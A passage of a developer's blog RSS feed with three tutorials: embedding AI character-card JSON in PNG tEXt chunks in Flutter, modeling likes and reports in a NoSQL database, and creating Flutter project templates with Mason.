&quot;extensions&quot;: {},<br>      &quot;entries&quot;: []<br>    },<br>    &quot;tags&quot;: [],<br>    &quot;creator&quot;: &quot;&quot;,<br>    &quot;character_version&quot;: &quot;&quot;,<br>    &quot;extensions&quot;: {}<br>  }<br>}</pre><p>It includes the various information about the character in JSON format. When a user brings this character image to the open source project, the Open source will extract the tEXt chunk metadata from the image and embed the character information in prompts to the LLM. That’s how the character sharing feature is implemented in such open-source projects.</p><p>Since prompts are just string data, and an image is BIG part of the data compared to just the prompts, sharing it in the format of a PNG image with prompts within its metadata makes sense.</p><p>When open source projects share characters with each other, if the metadata has different formats across projects, it would be difficult to share the characters. So the metadata follows a specific format called <a href="https://github.com/malfoyslastname/character-card-spec-v2?tab=readme-ov-file#proposed-fields">Character Card V2</a>. The example JSON above is in Character Card V2 format.</p><h4>Chunk Structure in PNG</h4><p>So embedding tEXt type chunk in the PNG image is how the character sharing feature is implemented. In the PNG, Each chunk has the format as following:</p><pre>{<br>  Length (4 byte),          # Size of the Chunk<br>  Chunk Type (4 byte),      # Type of the Chunk<br>  Chunk Data (length byte), # Data of the Chunk<br>  CRC (4byte)               # Used to detect corrupted or altered<br>}</pre><p>A PNG file has image data chunks (mostly with the IDAT type) between the IHDR (Header) and IEND (Footer) type chunks. An example is as follows:</p><pre>[<br>Length:          Length of the Chunk<br>Chunk Type:      IHDR<br>Chunk Data:      (Width, Height, Bit depth, Color type, Compression, Filter, Interlace)<br>CRC:             (4 bytes),<br><br>Length:          Length of the Chunk<br>Chunk Type:      IDAT<br>Chunk Data:      (image data)<br>CRC:             (4 bytes),<br><br>Length:          0<br>Chunk Type:      IEND<br>Chunk Data:      (0 byte)<br>CRC:             (4 bytes)<br>]</pre><p>What we need to do is insert tEXt type chunk between IHDR and IEND type chunk.</p><h4>Implementation in Flutter</h4><p>Add packages to pubspec.yaml.</p><pre>  png_chunks_encode: ^1.0.0<br>  png_chunks_extract: ^1.0.2</pre><p><a href="https://github.com/FlutterFans/png_chunks_encode">png_chunks_encode</a> and <a href="https://github.com/FlutterFans/png_chunks_extract">png_chunks_extract</a> are the packages that help to decode PNG into chunks / encode it back to PNG.</p><p>Read PNG chunks from the image with</p><pre>import &#39;package:png_chunks_extract/png_chunks_extract.dart&#39; as pngExtract;<br><br>List&lt;Map&lt;String, dynamic&gt;&gt;? readPNGChunks({<br>  required Uint8List BLOB<br>}) {<br>  try{<br>    return pngExtract.extractChunks(BLOB);<br>  } catch(e){<br>    debugPrint(&quot;Reading Chunk Failed $e&quot;);<br>    return null;<br>  }<br>}</pre><p>This will return the example List as following:</p><pre>[<br>  { name: &#39;IHDR&#39;, data: Uint8List([...]) },<br>  { name: &#39;IDAT&#39;, data: Uint8List([...]) },<br>  { name: &#39;IDAT&#39;, data: Uint8List([...]) },<br>  { name: &#39;IDAT&#39;, data: Uint8List([...]) },<br>  { name: &#39;IDAT&#39;, data: Uint8List([...]) },<br>  { name: &#39;IEND&#39;, data: Uint8List([]) }<br>]</pre><p>We will insert the tEXt type chunk between IHDR and IEND type in this list. According to <a href="https://www.w3.org/TR/PNG-Chunks.html">W3C,</a> tEXt type chunk data contains “keyword” and “data” and it’s separated by zero byte (null seperator). So insert it with the specific format.</p><pre>import &#39;package:png_chunks_encode/src/etc32.dart&#39;;<br>import &#39;dart:convert&#39;;<br><br>List&lt;Map&lt;String, dynamic&gt;&gt; addtEXtChunk({<br>  required List&lt;Map&lt;String, dynamic&gt;&gt; chunk,<br>  required String keyword,<br>  required String text,<br>}) {<br>  List&lt;int&gt; tEXtData = [...utf8.encode(keyword), 0, ...utf8.encode(text)];<br><br>  Uint8List chunkType = Uint8List.fromList(utf8.encode(&#39;tEXt&#39;));<br>  Uint8List dataBytes = Uint8List.fromList(tEXtData);<br>  Uint8List crcInput = Uint8List.fromList([...chunkType, ...dataBytes]);<br>  int crc = Crc32.getCrc32(crcInput);<br><br>  Map&lt;String, dynamic&gt; tEXtChunk = {<br>    &#39;name&#39;: &#39;tEXt&#39;,<br>    &#39;data&#39;: dataBytes,<br>    &#39;crc&#39;: crc<br>  };<br><br>  int end = chunk.indexWhere((chunk) =&gt; chunk[&#39;name&#39;] == &#39;IEND&#39;);<br>  chunk.insert(end, tEXtChunk);<br>  return chunk;<br>}</pre><p>The keyword and the data are separated by a zero byte, and it’s inserted just before IEND in this function. Now, encode this chunk back to PNG.</p><pre>import &#39;package:path/path.dart&#39; as p;<br>import &#39;package:png_chunks_encode/png_chunks_encode.dart&#39; as pngEncode;<br><br>static Future&lt;void&gt; saveChunkToPNG({<br>    required List&lt;Map&lt;String, dynamic&gt;&gt; chunk,<br>  }) async {<br>  final newBuffer = pngEncode.encodeChunks(chunk);<br>  final file = File(p.join(Directory.systemTemp.path, &#39;image.png&#39;));<br>  await file.create();<br>  await file.writeAsBytes(newBuffer);<br>}</pre><p>The image is successfully saved with the new chunk. Here’s the full demonstration of modifying PNG chunks in the sample app:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/360/1*SkOYk-QyH82fC4JNVopiEw.gif" /></figure><p>If you’re interested in the sample app code, please visit:</p><p><a href="https://github.com/jhj0517/flutter-samples">GitHub - jhj0517/flutter-samples: Practice Projects for Flutter</a></p><h3>Reference</h3><ul><li><a href="https://github.com/malfoyslastname/character-card-spec-v2">malfoyslastname/character-card-spec-v2: An updated specification for AI character cards. (github.com)</a></li><li><a href="https://www.w3.org/TR/PNG-Chunks.html">PNG Specification: Chunk Specifications (w3.org)</a></li><li><a href="https://cloudsecurityalliance.org/blog/2022/05/04/what-is-a-blob-binary-large-object-can-it-be-tokenized">What is a BLOB (Binary Large Object)? Can it be Tokenized? | CSA (cloudsecurityalliance.org)</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=6dcc68cbd4a4" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Modeling Social Likes & Reports in NoSQL]]></title>
            <link>https://medium.com/@developerjo0517/modeling-social-likes-reports-in-nosql-d23c78fcf179?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/d23c78fcf179</guid>
            <category><![CDATA[nosql]]></category>
            <category><![CDATA[database]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Thu, 09 May 2024 10:11:54 GMT</pubDate>
            <atom:updated>2025-01-12T16:47:30.043Z</atom:updated>
            <content:encoded><![CDATA[<h4>Follow a query-driven design approach</h4><p>When you model NoSQL database, you should always follow a query-driven design approach. Unlike the RDBMS, you shouldn’t query multiple keys to get specific data. For example, if you were modeling social “likes” in the RDBMS, you would create multiple tables with foreign keys like this:</p><pre>CREATE TABLE posts (<br>  id INTEGER PRIMARY KEY AUTOINCREMENT,<br>  content TEXT NOT NULL,<br>  author TEXT NOT NULL,<br>  likes_number INTEGER NOT NULL,<br>);<br><br>CREATE TABLE likes (<br>  id INTEGER PRIMARY KEY AUTOINCREMENT,<br>  post_id INTEGER REFERENCES posts(id),<br>  user TEXT NOT NULL,<br>);</pre><p>Unless you join the tables, you have to query id of the posts → query id of the likes to know who liked the post. In NoSQL, you shouldn’t set multiple “parent” nodes like you do in RDBMS.</p><pre>// Avoid this 2 parent nodes<br>{<br>  &quot;posts&quot;:{<br>    {<br>      &quot;id&quot;: &quot;post_id1&quot;,<br>      &quot;content&quot;: &quot;Hello&quot;,<br>      &quot;author&quot;: &quot;james&quot;,<br>      &quot;likes_number&quot;: 1,<br>    }<br>  },<br>  &quot;likes&quot;: {<br>    {<br>      &quot;id&quot;: &quot;like_id1&quot;,<br>      &quot;post_id&quot;: &quot;post_id1&quot;,<br>    }<br>  }<br>}</pre><p>Instead, you can embed likes within posts, creating posts as nested objects.</p><pre>// Do this instead.<br>{<br>  &quot;posts&quot;:{<br>    {<br>      &quot;id&quot;: &quot;post_id1&quot;,<br>      &quot;content&quot;: &quot;Hello&quot;,<br>      &quot;author&quot;: &quot;james&quot;,<br>      &quot;likes_number&quot;: 1,<br>      &quot;likes&quot;: [&quot;like_id1&quot;]<br>    }<br>  },<br>}</pre><p>You can know who liked the post by querying only the post. No need to query post → likes, because likes data is already included in the post when you fetch the post data. Unlike the table is sperated into multiple tables by concerns for normalization, the concept of “nested objects” is often used in NoSQL.</p><p>The important consideration when modeling data in NoSQL is to use a query-driven design approach to let you know as much as possible about each “post” related data by fetching the post only once. Just like embedding likes in a post, you can also embed reports in a post.</p><pre>{<br>  &quot;posts&quot;:{<br>    {<br>      &quot;id&quot;: &quot;post_id1&quot;,<br>      &quot;content&quot;: &quot;Hello&quot;,<br>      &quot;author&quot;: &quot;james&quot;,<br>      &quot;likes_number&quot;: 1,<br>      &quot;likes&quot;: [&quot;like_id1&quot;],<br>      &quot;reports_number&quot;: 1,<br>      &quot;reports&quot;: [{&quot;id&quot;: &quot;reports_id1&quot;, &quot;reason&quot;: &quot;violence&quot;}]<br>    }<br>  },<br>}</pre><h3>Reference</h3><ul><li><a href="https://stackoverflow.com/questions/41527058/many-to-many-relationship-in-firebase">Many to Many relationship in Firebase — Stack Overflow</a></li><li><a href="https://www.scylladb.com/2023/09/06/5-nosql-data-modeling-guidelines-for-avoiding-performance-issues/">5 NoSQL Data Modeling Guidelines for Avoiding Performance Issues — ScyllaDB</a></li><li><a href="https://stackoverflow.com/questions/49983808/how-to-model-data-in-nosql-databases">mongodb — How to model data in noSql databases — Stack Overflow</a></li><li><a href="https://www.mongodb.com/docs/manual/data-modeling/concepts/embedding-vs-references/">https://www.mongodb.com/docs/manual/data-modeling/concepts/embedding-vs-references/</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=d23c78fcf179" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Start a New Flutter Project Using a Template with Mason]]></title>
            <link>https://medium.com/@developerjo0517/start-a-new-flutter-project-using-a-template-with-mason-fac7c4417288?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/fac7c4417288</guid>
            <category><![CDATA[flutter]]></category>
            <category><![CDATA[masons]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Fri, 26 Apr 2024 11:58:52 GMT</pubDate>
            <atom:updated>2024-06-19T14:16:54.785Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fhDpphd8TCBF4EkNN4XrlQ.png" /></figure><p><a href="https://github.com/felangel/mason">Mason</a> is an open-source tool that allows you to start a project with a template. While Mason is popular for Flutter templates because it’s mainly written in Dart, but you can use it for any type of project, not just those based on Flutter.</p><h4>How Mason Works</h4><p>You can use the variable like {{package_name}} in the template by <a href="https://mustache.github.io/mustache.5.html">mustache syntax</a> in Mason. The idea of Mason is to let you define the value of this variable in the template when you start a project. For example, in Android, if you set the applicationId field in the app’s build.gradle with {{package_name}} like this,</p><pre>defaultConfig {<br>  applicationId &quot;{{application_id}}&quot;<br>}</pre><p>The {{application_id}} will be replaced with the value you define when you start a new project. So when you create a template for Flutter with Mason, you might want to embed the mustache variable like {{application_id}} across all 6 platforms.</p><h4>How to Use Mason</h4><ol><li>Install Mason CLI</li></ol><pre>dart pub global activate mason_cli</pre><p>2. Implement Your Template in a Specific Forder Structure</p><pre>.<br>├── __brick__<br>│   └── {{project_name}}<br>│       ├── page1.dart<br>│       └── page2.dart  <br>└── brick.yaml</pre><p>You typically have a brick.yaml file and a __brick__ folder like this. The __brick__ folder is where you will implement and structure your template. In the example above, when you create a project with Mason, it will generate {{project_name}}.</p><p>3. Write brick.yaml Configuration File</p><p>In Mason, the concept of a “brick” is used to metaphorically represent a template. You can set the configuration of your template in the brick.yaml. The following file is an example brick.yaml:</p><pre>name: my_template<br>description: My Flutter Template<br><br>version: 0.1.0<br><br>environment:<br>  mason: &quot;&gt;=0.1.0-dev.52 &lt;0.1.0&quot;<br><br>vars:<br>  project_name:<br>    type: string<br>    description: Project name<br>    default: project_name<br>    prompt: What is the project name?<br>  package_name:<br>    type: string<br>    description: Package name<br>    default: com.example.myapp<br>    prompt: What is the package name?</pre><p>Specify the variable like {{project_name}} and {{package_name}} that you used in the template in the brick.yaml like this.</p><p>4. Add Birck</p><p>Add the brick so you can use it in anywhere.</p><pre>mason add -g my_template --path ./</pre><p>Specify the --path option to indicate where your brick.yaml is located.</p><p>5. List Brick</p><pre>mason ls -g<br>├── my_template 0.1.0</pre><p>Check that your brick is added correctly.</p><p>6. Make Brick</p><pre>mason make my_template</pre><p>Now You can use the template with the above command in anywhere. It will asks how you will define the value of the variables like {{package_name}} that you specified in the brick.yaml.</p><h4>Embedding mustache variables for Flutter</h4><p>When crafting a template for Flutter projects using Mason, you might need to include a mustache variable such as {{application_id}} across all 6 supported platforms, like this:</p><ul><li>Android</li></ul><p>in AndroidManifest, MainActivity, build.gradle (app-level):</p><pre>// AndroidManifest<br>&lt;application<br>        android:label=&quot;{{project_name.titleCase()}}&quot;<br>/&gt;<br><br>// MainActivity<br>package {{application_id}}<br><br>// build.gradle<br>android {<br>    namespace &quot;{{application_id}}&quot;<br>    defaultConfig {<br>      applicationId &quot;{{application_id}}&quot;<br>    }<br>}</pre><ul><li>IOS</li></ul><p>in project.pbxproj, info.plist:</p><pre>// project.pbxproj<br>PRODUCT_BUNDLE_IDENTIFIER = {{application_id}}; // Update every fields<br><br>// info.plist<br> &lt;key&gt;CFBundleName&lt;/key&gt;<br> &lt;string&gt;{{project_name}}&lt;/string&gt;<br> &lt;key&gt;CFBundleDisplayName&lt;/key&gt;<br> &lt;string&gt;{{project_name}}&lt;/string&gt;</pre><ul><li>MacOS</li></ul><p>in project.pbxproj, Runner.xcscheme :</p><pre>// project.pbxproj<br>PRODUCT_BUNDLE_IDENTIFIER = {{application_id}}.RunnerTests; // Update every fields<br><br>// Runner.xcscheme<br>BuildableName = &quot;{{project_name.titleCase()}}.app&quot; // Update every fields</pre><ul><li>Web</li></ul><p>in index.html, manifest.json:</p><pre>// index.html<br>&lt;title&gt;{{project_name.titleCase()}}&lt;/title&gt;<br><br>// manifest.json<br>&quot;name&quot;: &quot;{{project_name.titleCase()}}&quot;</pre><ul><li>Windows</li></ul><p>in CMakeLists.txt :</p><pre>set(BINARY_NAME &quot;{{project_name.snakeCase()}}&quot;)</pre><ul><li>Linux</li></ul><p>in CMakeLists.txt :</p><pre>set(BINARY_NAME &quot;{{project_name.snakeCase()}}&quot;)</pre><p>I made a base template of templates for a Flutter project that embedded variables like this. You can start making a template with this base. Only built &amp; tested on Android for now, but if you’re still interested please visit:</p><p><a href="https://github.com/jhj0517/flutter_template_starter">GitHub - jhj0517/flutter_template_starter</a></p><h3>Reference</h3><ul><li><a href="https://docs.brickhub.dev/">🚀 Overview | BrickHub Docs</a></li><li><a href="https://github.com/VeryGoodOpenSource/very_good_templates">VeryGoodOpensource</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=fac7c4417288" width="1" height="1" alt="">]]></content:encoded>
        </item>
    </channel>
</rss>